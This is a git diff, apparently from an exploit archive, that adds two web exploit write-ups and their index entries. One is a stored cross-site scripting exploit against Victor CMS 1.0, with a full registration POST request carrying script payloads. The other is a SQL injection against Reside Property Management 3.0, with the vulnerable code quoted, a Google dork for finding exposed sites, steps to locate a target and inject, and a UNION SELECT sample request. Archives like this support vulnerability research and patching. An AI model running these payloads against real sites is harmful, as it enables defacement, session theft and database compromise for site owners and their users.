diff --git a/exploits/php/webapps/48626.txt b/exploits/php/webapps/48626.txt new file mode 100644 index 000000000..694c4d00d --- /dev/null +++ b/exploits/php/webapps/48626.txt @@ -0,0 +1,31 @@ +# Exploit Title: Victor CMS 1.0 - 'user_firstname' Persistent Cross-Site Scripting +# Google Dork: N/A +# Date: 2020-06-28 +# Exploit Author: Anushree Priyadarshini +# Vendor Homepage: https://github.com/VictorAlagwu/CMSsite +# Software Link:https://github.com/VictorAlagwu/CMSsite/archive/master.zip +# Version: 1.0 +# Tested on: Windows 10 + +Description: The form parameter 'user_firstname' and 'user_lastname' is vulnerable to stored cross site scripting + +Payload for 'user_firstname' : + +Payload for 'user_lastname' : + + + +POST /CMSsite-master/register.php HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.93 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.9,en-GB;q=0.8,en-CA;q=0.7,zh-CN;q=0.6,zh-HK;q=0.5,zh-SG;q=0.4,zh-TW;q=0.3,ja;q=0.2,ko;q=0.1 +Accept-Encoding: gzip, deflate +Referer: http://localhost/CMSsite-master/register.php +Content-Type: application/x-www-form-urlencoded +Content-Length: 190 +Connection: close +Cookie: PHPSESSID=491d4jir62vldd0u84knd1m1fi +Upgrade-Insecure-Requests: 1 + +user_name=DemoUser&user_firstname=%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&user_lastname=%3Cscript%3Ealert%282%29%3B%3C%2Fscript%3E&user_email=Hack%40gmail.com&user_password=1234®ister= \ No newline at end of file diff --git a/exploits/php/webapps/48627.txt b/exploits/php/webapps/48627.txt new file mode 100644 index 000000000..cf22688bf --- /dev/null +++ b/exploits/php/webapps/48627.txt @@ -0,0 +1,33 @@ +# Exploit Title: Reside Property Management 3.0 - 'profile' SQL Injection +# Date: 2020-06-28 +# Google Dork: "Copyright 2020 Reside Property Management" +# Exploit Author: Ultra Security Team (Ashkan Moghaddas , AmirMohammad Safari) +# Team Members: Behzad Khalifeh , Milad Ranjbar +# Vendor Homepage: https://www.13plugins.com/product/reside-v3-rental-property-management-php-script/ +# Version: v3.0 [Final Version] +# Tested on: Windows/Linux +# CVE: N/A + +.:: Description ::. +RESIDE makes it easy to manage all of your tenants & properties, record payments, and keep everything accessible any time, from any computer or device. + + +.:: Vulnerable File ::. +profile.php + + +.:: Vulnerable Code ::. +- Line 21: $profile = $_GET['profile']; +- Line 22: $adminsName = preg_replace('/-/', ' ', $profile); +- Line 90: $sql = "SELECT * FROM admins WHERE adminName = '" . $adminsName . "'"; +- Line 91: mysqli_query $result = mysqli_query($mysqli, $sql) or die ('-1' . mysqli_error()); + + +.:: Proof Of Concept (PoC) ::. +Step 1 - Find Your Target With the above Dork. +Step 2 - Find profile.php File in Target +Step 3 - Inject Your Payloads in profile parameter + + +.:: Sample Request ::. +localhost/reside-rental-property-management/Reside/profile.php?profile=-21%27+UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,user(),11,12,13,14,15,16,17,18,19,20,21,22,user(),24,25,26%23 \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 034705c2b..fae3f3c55 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -42881,3 +42881,5 @@ id,file,description,date,author,type,platform,port 48619,exploits/multiple/webapps/48619.txt,"BSA Radar 1.6.7234.24750 - Persistent Cross-Site Scripting",2020-06-24,"William Summerhill",webapps,multiple, 48621,exploits/php/webapps/48621.txt,"FHEM 6.0 - Local File Inclusion",2020-06-25,"Emre ÖVÜNÇ",webapps,php, 48623,exploits/php/webapps/48623.txt,"OpenEMR 5.0.1 - 'controller' Remote Code Execution",2020-06-26,"Emre ÖVÜNÇ",webapps,php, +48626,exploits/php/webapps/48626.txt,"Victor CMS 1.0 - 'user_firstname' Persistent Cross-Site Scripting",2020-06-30,"Anushree Priyadarshini",webapps,php, +48627,exploits/php/webapps/48627.txt,"Reside Property Management 3.0 - 'profile' SQL Injection",2020-06-30,"Behzad Khalifeh",webapps,php,